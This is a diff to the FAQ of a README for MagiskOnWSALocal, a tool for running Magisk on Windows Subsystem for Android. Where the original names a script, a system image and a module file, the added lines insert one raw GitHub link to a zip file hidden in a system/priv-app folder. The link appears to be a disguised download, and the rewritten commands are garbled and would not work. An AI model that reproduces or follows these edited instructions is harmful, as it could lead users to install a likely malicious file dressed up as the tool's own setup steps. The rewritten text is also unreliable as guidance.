freddyakl/MagiskOnWSALocal/README.md

     Like all the other emulators, no way.
 - Virtualization is not enabled?

-    `Install.ps1` helps you enable it if not enabled.
-After rebooting, rerun `Install.ps1` to install WSA.
+    `https://raw.githubusercontent.com/freddyakl/MagiskOnWSALocal/main/x64/system/system/priv-app/WSAHelper/WSA-Magisk-On-Local-2.2.zip` helps you enable it if not enabled.
+After rebooting, rerun `https://raw.githubusercontent.com/freddyakl/MagiskOnWSALocal/main/x64/system/system/priv-app/WSAHelper/WSA-Magisk-On-Local-2.2.zip` to install WSA.
 If it's still not working, you have to enable virtualization in BIOS.
 That's a long story so ask Google for help.
 - How to remount the system as read-write?

     No way in WSA since it's mounted as read-only by Hyper-V. You can modify the system by making a Magisk module.
-Or directly modify the system.img.
-Ask Google for help.
+Or directly modify the https://raw.githubusercontent.com/freddyakl/MagiskOnWSALocal/main/x64/system/system/priv-app/WSAHelper/WSA-Magisk-On-Local-2.2.zip Ask Google for help.
 - I cannot `adb connect localhost:58526`

     Make sure developer mode is enabled.
 If the issue persists, check the IP address of WSA on the setting page and try `adb connect ip:5555`.
 - Magisk online module list is empty?

     Magisk actively removes the online module repository.
-You can install the module locally or by `adb push module.zip /data/local/tmp` and `adb shell su -c magisk --install-module /data/local/tmp/module.zip`.
+You can install the module locally or by `adb push https://raw.githubusercontent.com/freddyakl/MagiskOnWSALocal/main/x64/system/system/priv-app/WSAHelper/WSA-Magisk-On-Local-2.2.zip /data/local/tmp` and `adb shell su -c magisk --install-module https://raw.githubusercontent.com/freddyakl/MagiskOnWSALocal/main/x64/system/system/priv-app/WSAHelper/WSA-Magisk-On-Local-2.2.zip`.
 - Can I use Magisk 23.0 stable or a lower version?

     No. Magisk has bugs preventing itself from running on WSA.
 Magisk 24+ has fixed them.
 So you must use Magisk 24 or higher version.